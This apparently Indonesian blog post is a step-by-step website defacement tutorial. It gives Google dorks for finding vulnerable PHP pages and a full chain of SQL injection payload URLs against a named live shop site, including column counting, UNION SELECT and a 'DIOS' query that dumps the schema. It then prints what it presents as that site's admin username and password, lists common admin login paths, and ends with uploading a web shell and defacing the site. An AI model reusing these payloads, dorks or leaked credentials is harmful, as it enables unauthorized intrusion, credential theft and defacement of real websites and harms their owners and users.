Deface Poc SQL injection + Upload Shell
Assalamualaikum aa/teteh adick-adick
Kali ini nzul yang ganteng akan lanjutin lagi ya tentang bug SQL injection.
Ok sekarang lanjut ya, seperti biasa kamu nge dork dulu
Dork?
inurl:/com-product.php?id=
inurl:/gov-product.php?id=
inurl:/in-product.php?catid=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
Kembangin lagi yaa
Karena disini aku sudah ada live target
Jadi langsung aja
Live target yang aku pake? Touch me oneeSan
Step by step
Kamu cari dulu parameter nya
Pertama kalian cek dulu apakah vuln SQL
Caranya dengan menambahkan kode (')
Misal
http://tokoflobamoracomputermalang.com/detail.php?id=52'
http://tokoflobamoracomputermalang.com/detail.php?id=52%27--+- (error)
Nah bakalan jadi gini nantinya.
Terus kalian tambahkan (--+-)
http://tokoflobamoracomputermalang.com/detail.php?id=52%27--+- (normal)
Dan webnya kembali seperti semula.
Ok sekarang kita order by
Buat mencari letak eror nya dimana
Coba dlu Ampe angka 10
http://tokoflobamoracomputermalang.com/detail.php?id=52%27+order+by+1,2,3,4,5,6,7,8,9,10--+- (normal)
http://tokoflobamoracomputermalang.com/detail.php?id=52%27+order+by+1,2,3,4,5,6,7,8,9--+-(normal)
http://tokoflobamoracomputermalang.com/detail.php?id=52%27+order+by+1,2,3,4,5,6,7,8--+-(normal)
http://tokoflobamoracomputermalang.com/detail.php?id=52%27+order+by+1,2,3,4,5,6,7--+-(error)
Nah di angka 7 erornya
Berarti kita union select Ampe angka 6
Nah gini, jangan lupa kasih (-) dibelakang param
http://tokoflobamoracomputermalang.com/detail.php?id=-52%27+union+select+1,2,3,4,5,6--+-
Nah muncul deh angka ajaib 2
Ok dikarenakan ini mau upload Shell
Jadi kita pake Dios ini:
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Jadi seperti ini, tempelkan di angka 2
Karena disitulah angka ajaibnya
http://tokoflobamoracomputermalang.com/detail.php?id=-52%27+union+select+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5,6--+-
Dann booommm database udah keliatan
Tinggal Kelen nyari table adminnya
Dan username/password nya
http://tokoflobamoracomputermalang.com/detail.php?id=-52%27+union+select+1,username,3,4,password,6+from+admin--+-
Nah dan boom muncul deh username dan passwordnya
Username: flobamoracomputer
Password: malang2112346
Setelah menemukan username/password
Jangan lupa untuk nyari tempat login nya dulu, jadi kalian GK capek" nginject nya
Site.com/admin
Site.com/admin/login
Site.com/login
Site.com/admin.php
Site.com/login.php
Nah setelah masuk dasbor Kelen cari aja tempat upload
Nah tinggal upload yakan shellmu.
Dan jangan lupa juga terkadang web yang vuln SQL, itu ada yang bisa langsung upload Shell ada juga yang harus kamu Tamper data
Kalo misal 403 gunakan Shell bypass
Intinya pandai" aja ya
Nah tinggal buka di new tab
Nah muncul deh
Dan boom, tinggal di Deface deh
Ok sekian ya tutorial dari nzul
Semoga bermanfaat
Visit juga my friend Suhu Sanz
Greatz:
Thanks u all and my friend
Posting Komentar untuk "Deface Poc SQL injection + Upload Shell"